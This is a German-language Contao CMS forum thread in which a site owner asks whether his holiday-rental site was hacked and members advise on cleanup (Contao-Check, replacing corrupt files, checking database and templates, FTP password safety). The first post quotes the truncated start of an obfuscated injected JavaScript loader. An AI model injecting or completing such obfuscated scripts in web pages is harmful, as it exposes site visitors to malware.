Ergebnis 1 bis 17 von 17

Thema: Wurde meine Seite gehackt?

  1. #1
    Contao-Nutzer
    Registriert seit
    10.05.2010.
    Ort
    Hagen, NRW
    Beiträge
    51

    Standard Wurde meine Seite gehackt?

    Hallo liebe Forengemeinde!

    Ich hoffe das ich mit meinem Problem in diesem Forum-Thema richtig bin.

    Vermutlich hat sich auf eine von mir erstellte Internetseite, www.wiesengrund-ferienwohnung.de, ein Virus ein geschlichen. Er taucht auf der Startseite im Quellcode nach dem abschließenden html-Tag auf:

    <script>ps="sp"+"li"+"t";asd=function(){++d.body}; a=("15,15,155,152,44,54,150,163,147,171,161,151,16 2,170,62,153,151,170,111,160,151,161,151,162,170,1 67....

    Kann mir jemand Tipps geben wie ich den entferne, bzw. wo ich dieses Script in der umfangreichen CONTAO-Installation aufstöbern kann um ihn zu entfernen?

    Vielen Dank im Voraus für die Hilfe und Unterstützung.

    Gruß Guido

  2. #2
    Contao-Urgestein
    Registriert seit
    03.06.2010.
    Ort
    Wuppertal
    Beiträge
    2.149
    User beschenken
    Wunschliste

  3. #3
    Gesperrt
    Registriert seit
    23.06.2009.
    Ort
    Rheinfelden
    Beiträge
    322

    Standard

    Du bist wirklich nicht der einzige Betroffene, das Zeug ist ziemlich verbreitet.
    Etwas mehr Info, was dieser Code tut, hier

  4. #4
    Contao-Nutzer
    Registriert seit
    10.05.2010.
    Ort
    Hagen, NRW
    Beiträge
    51

    Standard Interessant ....

    ... an der ganze Sache ist nur, das das Script bei mir im Quellcode nicht erscheint. Dies war ein Hinweis von einem Kunden. Ein paar Freunde und Bekannte habe ich gebeten die Seite aufzurufen und mit mitzuteilen was passiert -- NICHTS. Keine Fehlermeldung und kein Script am Ende des Quellcodes.

    Davon ausgehend das folgende Prüfprogramme auf den Seiten http://www.urlvoid.com und https://website-klinik.de seriös sind ist dort jeweils alles im grünen Bereich.
    Geändert von g.lorenz (22.06.2013 um 21:43 Uhr)

  5. #5
    Contao-Fan Avatar von fabil
    Registriert seit
    10.11.2010.
    Beiträge
    383

    Standard

    Um zu sehen, ob der Contao-Core verändert wurde, kannst du den Contao-Check herunterladen und aufrufen.
    Dann werden dir - im Falle korrupter Core-Dateien - diese angezeigt.

    Vermutlich befindet sich es in einem Template..

    https://contao.org/de/news/neuer-con...onsumfang.html
    Github-Account: https://github.com/fabil

  6. #6
    Contao-Nutzer
    Registriert seit
    10.05.2010.
    Ort
    Hagen, NRW
    Beiträge
    51

    Standard

    Wo kann ich den Contao-Check denn runterladen? Finde den nicht. Oder habe ich Tomaten auf den Augen

  7. #7
    AG Pressearbeit
    Community-Moderator
    Buchautor 'Contao für Webdesigner'
    Avatar von planepix
    Registriert seit
    05.06.2009.
    Ort
    Stuttgart
    Beiträge
    6.478
    Partner-ID
    107
    Contao-Projekt unterstützen

    Support Contao

    Standard

    Der Link steht weiter unten in der verlinkten Seite.
    Direktdownload: https://codeload.github.com/contao/check/zip/master
    ---------------------------------
    Beste Grüße planepix
    Contao für Webdesigner (Website), Twitter: @contaowebdesign
    weitzeldesign
    Contao-Sprechstunde
    Contao Schulungen: https://www.weitzeldesign.com/cms-co...chulungen.html
    Contao Jahrbuch: www.contao-jahrbuch.de
    Contao Agenturtag: www.contao-agenturtag.de
    Contao Stammtisch Stuttgart: www.contao-stammtisch-stuttgart.de
    Contao 4 Erfahrungen als Gitbook: https://app.gitbook.com/@planepix/s/...-mit-contao-4/
    Contao 4 & Manager Hosterhinweise: https://github.com/contao/contao-manager/wiki

    Schon wieder ein Update?
    Glücklich sind die, die den Wert erkennen – und wertschätzen.
    „Muss man machen wie beim Zahnarzt. Der bestraft einen auch mit hohen Rechnungen wenn man die Pflege vernachlässigt.”

  8. #8
    Contao-Urgestein Avatar von KlausGrenoble
    Registriert seit
    27.01.2013.
    Ort
    Grenoble
    Beiträge
    2.362

    Standard

    Damit da keine Fragen aufkommen:
    Die zip-Datei entpacken und einfach den "check"-Ordner in das root-Verzeichnis kopieren.
    Anschliessend domain.com/check/ aufrufen.
    Und da, wo "More information..." steht, gibt's (wie angedeutet) auch noch mehr wichtige Informationen.
    Korrupte Dateien dann einfach mit den Originaldateien überschreiben, würde ich mal als Laie sagen.

  9. #9
    Contao-Nutzer
    Registriert seit
    09.05.2011.
    Ort
    Krefeld
    Beiträge
    102

    Standard

    Ich weiß jetzt nicht, ob es was damit zu tun, aber bisher hatte ich folgende Meldung noch nie, wenn ich mit einem Firefox eine Seite aufgerufen hatte.

    Die angesprochene Webseite wollte unbedingt ein neues Java Plugin installieren. Ich hatte jetzt aber nicht den Mut dies auch zu machen, um auszuprobieren, was dann dieser eventuelle Virus macht.

  10. #10
    Contao-Fan Avatar von fabil
    Registriert seit
    10.11.2010.
    Beiträge
    383

    Standard

    Hallo Sven,

    bis die Seite nicht Schadcodefrei ist, sollte diese nicht mehr öffentlich zugänglich sein. Hast du diese vorsorglich schon vom Netz genommen?

    Und hast du den Contao-Check einmal aufgerufen und nachgeschaut? :-)

    Niemals dieses Java Plugin installieren! Man weiß nie, was dieses anrichten kann..

    Viele Grüße
    Github-Account: https://github.com/fabil

  11. #11
    Contao-Nutzer
    Registriert seit
    10.05.2010.
    Ort
    Hagen, NRW
    Beiträge
    51

    Standard Ich habe den check...

    ...aufgerufen und bekomme jetzt diese Meldung:

    check.jpg

    Traue mich nicht da jetzt irgendwas zu installieren weil evtl. die ganze Seite dann nicht mehr funktioniert. Wollte doch eigentlich nur die Seite prüfen.

  12. #12
    Contao-Urgestein Avatar von FloB
    Registriert seit
    19.06.2009.
    Ort
    Sonnensystem
    Beiträge
    1.618

    Standard

    "Validate an existing installation"
    So long,
    FloB since Nov. 2007 +706P +115P and counting

  13. #13
    Contao-Nutzer
    Registriert seit
    10.05.2010.
    Ort
    Hagen, NRW
    Beiträge
    51

    Standard Dann ...

    ...erscheint dieses bild:

    check2.jpg

    Wie habe ich das zu interpretieren? Kann die veraltete Version 2.10... der Verursacher sein?

  14. #14
    Administratorin Avatar von lucina
    Registriert seit
    19.06.2009.
    Ort
    Kiel (DE)
    Beiträge
    7.337
    Partner-ID
    152
    User beschenken
    Wunschliste
    Contao-Projekt unterstützen

    Support Contao

    Standard

    Das bedeutet, dass Du die Dateien der MusicAcademy gelöscht hast (nicht weiter tragisch) und dass die unter 'Corrupt' gelisteten Daten ... hmm ... verändert (korrumpiert) wurden und folglich durch die Originaldateien (beispielsweise von http://sourceforge.net/projects/cont...3.zip/download) ersetzt gehören.

    Damit sollten die Dateien erst einmal sauber sein. Es kann allerdings ebenfalls sein, dass jemand Code in Deine Datenbank geschmuggelt hat, der dafür sorgt, dass saubere Dateien wieder mit Schadcode befüllt werden. Mal die DB anschauen, bitte, ob dort irgendwelche obskuren Inhaltselemente oder Module siedeln. Ausserdem mal den /templates-Ordner anschauen.

    Aus Deinem ersten Screenshot entnehme ich obendrein, dass Du den Safemode nutzt und daher ggf. die Veränderungen via FTP vorgenommen worden sein könnten. Bitte überprüfe Dein FTP-Programm (und wechsle es, sofern es sich dabei um Filezilla handelt). Ggf. solltest Du alle Deine Passwörter ändern (Filezilla speichert die zuvorkommend im Klartext ab, so dass die Wahrscheinlichkeit, dass auch andere Passwörter bekannt sind, eher groß ist).

  15. #15
    Contao-Fan
    Registriert seit
    17.11.2011.
    Ort
    Basel (Schweiz)
    Beiträge
    295

    Standard

    Zitat Zitat von lucina Beitrag anzeigen
    Bitte überprüfe Dein FTP-Programm (und wechsle es, sofern es sich dabei um Filezilla handelt). Ggf. solltest Du alle Deine Passwörter ändern (Filezilla speichert die zuvorkommend im Klartext ab, so dass die Wahrscheinlichkeit, dass auch andere Passwörter bekannt sind, eher groß ist).
    Hallo

    Die Passwörter werden aber nur lokal, also bei mir auf meiner Kiste gespeichert. Wo ist das Problem? Ich arbeite schon bald 10 Jahre mit Filezilla und bei mir wurde noch nie eine Seite gehackt. Ausserdem hat Filezilla einen Kiosk-Mode. Nur Glück gehabt? Glaube ich nicht. Der viel zitierte WinSCP ist eben auch keine Alternative, da eine wirklich schrecklich lahme Ente.

    Gruss pumukel

  16. #16
    Contao-Yoda Avatar von MacKP
    Registriert seit
    15.06.2009.
    Ort
    Duisburg
    Beiträge
    13.292
    User beschenken
    Wunschliste
    Contao-Projekt unterstützen

    Support Contao

    Standard

    Hier mal ein kleiner Bericht zu Filezilla: http://mrcrowley.de/testbericht/so-u...ist-filezilla/
    Da steht warum das so blöde ist.. auch wie man das verhindert (wie du schon sagtest Kiosk Modus..).
    Am Ende ist man selber für die Sicherheit von seinem System verantwortlich.. und naja, bei Windows ist das oft nur glücksache, auch wenn man aufpasst und alles regelmäßig updatet etc.

    Viele Grüße
    Contao Pool | C-C-A | MetaModels | [Internetseite -> Mediendepot Ruhr]
    [Arbeitet bei -> Paus Design & Medien]
    "I can EXPLAIN it to you, but I can't UNDERSTAND it for you."

  17. #17
    Community-Moderator Avatar von stefan-at-work
    Registriert seit
    05.06.2009.
    Ort
    Bad Segeberg
    Beiträge
    1.780
    Partner-ID
    634

    Standard

    Zitat Zitat von pumukel Beitrag anzeigen
    Die Passwörter werden aber nur lokal, also bei mir auf meiner Kiste gespeichert. Wo ist das Problem? l
    Trojaner oder andere Arten von unberechtigetem Zugriff auf Dein System

    Zitat Zitat von pumukel Beitrag anzeigen
    Ausserdem hat Filezilla einen Kiosk-Mode. l
    Der ist aber standardmäßig auf "0" gesetzt und muss manuell in der XML-Datei auf "1" gesetzt werden, damit er greift. Und das wissen 99% aller User nicht.

Aktive Benutzer

Aktive Benutzer

Aktive Benutzer in diesem Thema: 1 (Registrierte Benutzer: 0, Gäste: 1)

Lesezeichen

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •